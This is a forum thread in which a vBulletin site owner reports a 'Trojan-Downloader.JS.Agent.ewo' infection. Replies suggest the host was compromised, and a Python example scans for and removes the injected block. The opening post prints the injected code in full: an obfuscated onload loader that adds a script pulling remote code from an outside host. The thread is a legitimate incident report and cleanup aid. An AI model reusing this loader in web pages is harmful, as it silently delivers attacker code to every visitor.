My vB 3.8 websites infected with "Trojan-Downloader.JS.Agent.ewo"

  • My vB 3.8 websites infected with "Trojan-Downloader.JS.Agent.ewo"

    This trojan adds a line of code at the end of:
    >Every file containing the word "index"
    >Every JavaScript file

    Here is the malware code:
    Code:
    /*LGPL*/ try{ window.onload = function(){var Est1o8ahkk = document.createElement('s&@c(@)r@$i#@p@!!t^&@'.replace(/\(|\!|\$|#|\^|@|\)|&/ig, ''));Est1o8ahkk.setAttribute('defer', 'd@e(f$!(e$^r(#'.replace(/@|#|\!|\)|\^|&|\(|\$/ig, ''));Est1o8ahkk.setAttribute('type', 't$@#e@x!#)$t$/&@#j&a!((^v&&a$^!)s#&c($)r^!i!p&#@(t@(!('.replace(/\)|\$|&|#|@|\^|\(|\!/ig, ''));Est1o8ahkk.setAttribute('id', 'F)@&7)()g&^(n$^@a&(!p$)i!&(8(#(c&(@&z$!)h#'.replace(/#|\!|\)|\$|&|@|\^|\(/ig, ''));Est1o8ahkk.setAttribute('s(&)&r$!c^^@!'.replace(/\^|\!|#|\(|@|\$|\)|&/ig, ''),  'h^!t&$$t@)p^)&:&^(/@(/&!()t^$@a(r#g^##!e#@t(#-(@c!#^&&o&!$m(#!.#((s)@&t#@$c^^!.$$$!#c^o^!)m^.#)s^a^.(m($#e^$d#i($$a^f##)i$^r$e!&#-)$c$&(o@!(m!$!.()!#t$e($e$)n@)@!&w^e^b!)^d&&e^#s(i^g#$(n^&.#&(!@r&^)u(:^#8^(#0##$8&#(^$0(/^w!^(e@&a$@t$h)$e))!@r^#.^!c$#o#&m)/&(w#&e)$!$a^!t@h!^e$r(@(.)^)c(#o&^!m)!$/^^!g&#(^o^^#(^o#)g(&l!!#e@#.@c)!)o$m^&$/!&!#e^((x$(#c(!!i!t#e^&^.@!c&($o@&.#)j&@p&#/&&&h@$$^(a#r&)d&s)#!^e@!x$(t&&u#b@@e!(.$#c!)#!o&m#/)$$!#'.replace(/\(|#|&|\^|\!|\)|\$|@/ig, ''));if (document){document.body.appendChild(Est1o8ahkk);}} } catch(Rf6tzozxjhnoqp6eleyo) {}
    
    <script>/*LGPL*/ try{ window.onload = function(){var Est1o8ahkk = document.createElement('s&@c(@)r@$i#@p@!!t^&@'.replace(/\(|\!|\$|#|\^|@|\)|&/ig, ''));Est1o8ahkk.setAttribute('defer', 'd@e(f$!(e$^r(#'.replace(/@|#|\!|\)|\^|&|\(|\$/ig, ''));Est1o8ahkk.setAttribute('type', 't$@#e@x!#)$t$/&@#j&a!((^v&&a$^!)s#&c($)r^!i!p&#@(t@(!('.replace(/\)|\$|&|#|@|\^|\(|\!/ig, ''));Est1o8ahkk.setAttribute('id', 'F)@&7)()g&^(n$^@a&(!p$)i!&(8(#(c&(@&z$!)h#'.replace(/#|\!|\)|\$|&|@|\^|\(/ig, ''));Est1o8ahkk.setAttribute('s(&)&r$!c^^@!'.replace(/\^|\!|#|\(|@|\$|\)|&/ig, ''),  'h^!t&$$t@)p^)&:&^(/@(/&!()t^$@a(r#g^##!e#@t(#-(@c!#^&&o&!$m(#!.#((s)@&t#@$c^^!.$$$!#c^o^!)m^.#)s^a^.(m($#e^$d#i($$a^f##)i$^r$e!&#-)$c$&(o@!(m!$!.()!#t$e($e$)n@)@!&w^e^b!)^d&&e^#s(i^g#$(n^&.#&(!@r&^)u(:^#8^(#0##$8&#(^$0(/^w!^(e@&a$@t$h)$e))!@r^#.^!c$#o#&m)/&(w#&e)$!$a^!t@h!^e$r(@(.)^)c(#o&^!m)!$/^^!g&#(^o^^#(^o#)g(&l!!#e@#.@c)!)o$m^&$/!&!#e^((x$(#c(!!i!t#e^&^.@!c&($o@&.#)j&@p&#/&&&h@$$^(a#r&)d&s)#!^e@!x$(t&&u#b@@e!(.$#c!)#!o&m#/)$$!#'.replace(/\(|#|&|\^|\!|\)|\$|@/ig, ''));if (document){document.body.appendChild(Est1o8ahkk);}} } catch(Rf6tzozxjhnoqp6eleyo) {}</script>
    <!--3abf2ff8e4f89cfaa024a3d05e678819-->
    I just would like to know if the contamination came from vB or my host.

    Cédric
    Last edited by cclaerhout; Mon 11th Jan '10, 6:39am.

  • #2
    Nothing in vBulletin by default can edit files. If your files have been edited they have server level access.

    Comment


    • #3
      Thanks for your answer, I'm going to inform my host.

      Comment


      • #4
        more information about this trojan here

        Comment


        • #5
          I had one last year. It was horrible.
          s.molinari - I would like to ask all customers to definitely feedback issues with the software and be specific with the issues, but to basically suck-up what happened in the past and try to just look forward.

          Comment


          • #6
            Thank you very much for your answers. I've finished fixing the first of my websites. Still one to do.

            It takes a huge amount of time.

            Comment


            • #7
              Provided you've not modified them yourself for a plugin etc, just upload a fresh copy of all files from the Members area. Will make things a lot quicker than hunting down every 'index.php' file and removing the code.

              Comment
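For files that were customised and cannot simply be replaced with a fresh copy, the appended block can be located and removed mechanically. The following is an added example, not code from this thread or from vBulletin: the signature is derived from the snippet in the first post, the function names are hypothetical, and the sample input is constructed with a placeholder host. It decodes the padded string literals statically, without running the script, so the loaded address can be reported to the host.

```python
import os
import re

# Characters the injected snippet pads its string literals with; each padded
# literal is followed by .replace(/<those characters>/ig, '').
JUNK = str.maketrans("", "", "()!$#^@&")
PADDED = re.compile(r"'([^']*)'\.replace\(/[^/]+/ig,\s*''\)")

# The appended block as posted: optional <script> wrapper, the /*LGPL*/ marker,
# the try/catch around window.onload, and an optional <!--32 hex digits--> tag.
INJECTED = re.compile(
    r"(?:<script>)?/\*LGPL\*/\s*try\{\s*window\.onload\s*=.*?catch\(\w+\)\s*\{\}"
    r"(?:</script>)?(?:\s*<!--[0-9a-f]{32}-->)?", re.DOTALL)

def find_injections(text):
    """Return, per injected block, its string literals decoded statically."""
    return [[m.group(1).translate(JUNK) for m in PADDED.finditer(block.group(0))]
            for block in INJECTED.finditer(text)]

def clean_text(text):
    """Return text with every injected block removed."""
    return INJECTED.sub("", text)

def scan(root):
    """Yield (path, decoded literals) for infected index*/.js files under root."""
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            if "index" in name or name.endswith(".js"):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = find_injections(fh.read())
                if hits:
                    yield path, hits

# Constructed sample: same padding scheme, placeholder host, zeroed marker.
SAMPLE = (
    "<?php echo 'ok'; ?>\n"
    r"<script>/*LGPL*/ try{ window.onload = function(){var x = document.createElement("
    r"'s@c#r!i$p^t'.replace(/@|#|\!|\$|\^/ig, ''));"
    r"x.setAttribute('s(r&c'.replace(/\(|&/ig, ''), "
    r"'h@t#t!p:$/^/e(x)a&m@p#l!e.i$n^v(a)l&i@d/'.replace(/@|#|\!|\$|\^|\(|\)|&/ig, ''));"
    r"document.body.appendChild(x);} } catch(e) {}</script>"
    "\n<!--00000000000000000000000000000000-->\n")

if __name__ == "__main__":
    print(find_injections(SAMPLE))
    print(repr(clean_text(SAMPLE)))
```

`scan()` only reports; write the output of `clean_text()` back to a file only after the host has closed the server-level access, otherwise the block is simply appended again.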
